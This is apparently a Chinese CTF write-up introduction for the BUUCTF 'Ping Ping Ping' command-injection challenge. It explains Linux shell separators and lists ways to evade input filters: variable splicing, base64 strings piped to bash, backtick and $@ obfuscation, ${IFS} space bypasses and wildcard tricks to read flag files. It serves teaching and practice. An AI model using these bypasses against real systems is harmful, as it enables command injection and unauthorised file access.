BUUCTF-[GXYCTF2019]Ping Ping Ping

一道命令执行题目

一、基础知识

Linux shell特殊字符（参考链接）

【;】作为多个命令语句的分隔符(Command separator [semicolon])。要在一个语句里面执行多个命令时，可以使用分号分隔。注意，有时候分号需要转义。

【|】管道(pipe)。管道是Linux，Unix都有的概念，是非常基础，也是非常重要的一个概念。它的作用是将管道前（左边）的命令产生的输出(stdout)作为管道后（右边）的命令的输入(stdin)。

【{}】代码块(curly brackets)。这个是匿名函数，但是又与函数不同，在代码块里面的变量在代码块后面仍能访问。注意：花括号内侧需要有空格与语句分隔。

linux命令执行绕过姿势总结（参考链接）

1）|| 符号当前一条命令执行结果为false 就执行下一条命令

2）| 符号只执行 | 符号后面的命令

3）&&符号当前一条命令执行结果为true 就执行下一条命令

4）&符号只执行 & 符号后面的命令

5）; 符号不管前一条命令执行的结果是什么，执行下一条命令

6）a=l;b=s;$a$b //变量覆盖

7）`echo d2hvYW1p | base64 -d ` echo d2hvYW1p | base64 -d | bash //base64绕过

8）w`saaaddd8450`ho`762aseba2`am`f0j71`i wh$(caigou)oa$(anquan)mi 666`whoami`666 //反引号加混淆

9）wh$1oami who$@ami whoa$*mi //$1、$@、$*混淆

10）${PATH:5:1}${PATH:2:1} （执行了ls） //提取环境变量中的字符执行命令(注意切片是从0开始计数的)对于环境变量字符过少的问题，可以通过export PATH=$PATH:/abcdefg/hijklmn/opq/rst/uvw/xyz/0123456789设置临时环境变量

Linux下空格绕过方式

1）cat${IFS}flag.txt
2）cat$IFS$1flag.txt //此处的数字可以换
3）cat<flag.txt
4）cat<>flag.txt
5）{cat,flag.txt} //在大括号中可用逗号代替空格(前面没有$)

Linux下对过滤字符的绕过方式

1）cat fl* //利用*可以任意匹配一个或多个字符
2）cat fl?g //利用?可以任意匹配一个字符
3）echo “Y2F0IGZsYWcucGhw”| base64 -d | bash //base64编码为所要执行的shell命令
4）ca\t fl\ag.php //有待了解
5）cat fl''ag.php
6）a=a;cat${IFS}fl$ag.php //通过变量覆盖绕过字符过滤
7）cat `ls` //通过命令引用绕过